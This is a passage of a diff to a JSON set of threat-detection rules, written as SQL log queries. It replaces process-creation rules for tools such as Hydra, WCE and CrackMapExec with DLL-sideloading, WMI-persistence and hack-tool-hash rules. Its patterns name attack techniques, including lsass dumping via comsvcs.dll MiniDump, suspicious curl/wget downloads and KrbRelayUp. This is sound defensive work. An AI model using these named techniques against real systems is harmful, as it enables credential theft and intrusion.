+ "cve.2022.30190" ], "falsepositives": [ - "Software that uses the caret encased keywords PASS and USER in its command line" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-u %' 
ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_hydra.yml" + "filename": "image_load_dll_sdiageng_load_by_msdt.yml" }, { - "title": "Suspicious Download from Office Domain", - "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", - "status": "experimental", - "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", - "falsepositives": [ - "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" + "title": "WMI Persistence - Command Line Event Consumer", + "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", + "status": "test", + "description": "Detects WMI command line event consumers", + "author": "Thomas Patzke", + "tags": [ + "attack.t1546.003", + "attack.persistence" ], - "filename": "proc_creation_win_susp_download_office_domain.yml" + "falsepositives": [ + "Unknown (data set is too 
small; further testing needed)" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" + ], + "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" }, { - "title": "Suspicious Rundll32 Without Any CommandLine Params", - "id": "1775e15e-b61b-4d14-a1a3-80981298085a", + "title": "DLL Load By System Process From Suspicious Locations", + "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", "status": "experimental", - "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location such as C:\\Users\\Public", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1070" ], "falsepositives": [ - "Possible but rare" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_no_params.yml" + "filename": "image_load_susp_dll_load_system_process.yml" }, { - "title": "HackTool - Windows Credential Editor (WCE) Execution", - "id": "7aa7009a-28b9-4344-8c1f-159489a390df", - "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - "author": 
"Florian Roth (Nextron Systems)", + "title": "Aruba Network Service Potential DLL Sideloading", + "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", + "status": "experimental", + "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Another service that uses a single -s command line switch" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' 
ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_wce.yml" + "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" }, { - "title": "Suspicious IIS Module Registration", - "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", - "status": "test", - "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", - "author": "Florian Roth (Nextron Systems), Microsoft (idea)", + "title": "Potential Iviewers.DLL Sideloading", + "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", + "status": "experimental", + "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", + "author": "X__Junior (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_iis_susp_module_registration.yml" + "filename": "image_load_side_load_iviewers.yml" }, { - "title": 
"HackTool - CrackMapExec Process Patterns", - "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "title": "Microsoft Defender Loading DLL from Nondefault Path", + "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", "status": "experimental", - "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 
'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" + "filename": "image_load_side_load_windows_defender.yml" }, { - "title": "Suspicious GUP Usage", - "id": "0a4f6091-223b-41f6-8743-f322ec84930b", - "status": "test", - "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "title": "Hacktool Download", + "id": "19b041f6-e583-40dc-b842-d6fa8011493f", + "status": "experimental", + "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ - "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', 
'672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', 
'11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_gup_suspicious_execution.yml" + "filename": "create_stream_hash_hacktool_download.yml" }, { - "title": "VolumeShadowCopy Symlink Creation Via Mklink", - "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", - "status": "stable", - "description": "Shadow Copies storage symbolic link creation using operating systems utilities", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "Potential Suspicious Winget Package Installation", + "id": "a3f5c081-e75b-43a0-9f5b-51f26fe5dba2", + "status": "experimental", + "description": "Detects potential suspicious winget package installation from a suspicious source.", + "author": "Nasreddine 
Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.defense_evasion", + "attack.persistence" ], "falsepositives": [ - "Legitimate administrator working with shadow copies, access for backup purposes" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND (Contents LIKE '%://1%' ESCAPE '\\' OR Contents LIKE '%://2%' ESCAPE '\\' OR Contents LIKE '%://3%' ESCAPE '\\' OR Contents LIKE '%://4%' ESCAPE '\\' OR Contents LIKE '%://5%' ESCAPE '\\' OR Contents LIKE '%://6%' ESCAPE '\\' OR Contents LIKE '%://7%' ESCAPE '\\' OR Contents LIKE '%://8%' ESCAPE '\\' OR Contents LIKE '%://9%' ESCAPE '\\') AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" + "filename": "create_stream_hash_winget_susp_package_source.yml" }, { - "title": "HackTool - KrbRelayUp Execution", - "id": "12827a56-61a4-476a-a9cb-f3068f191073", + "title": "Suspicious File Download From File Sharing Websites", + "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", "status": "experimental", - "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ - "Unlikely" + "Unknown" 
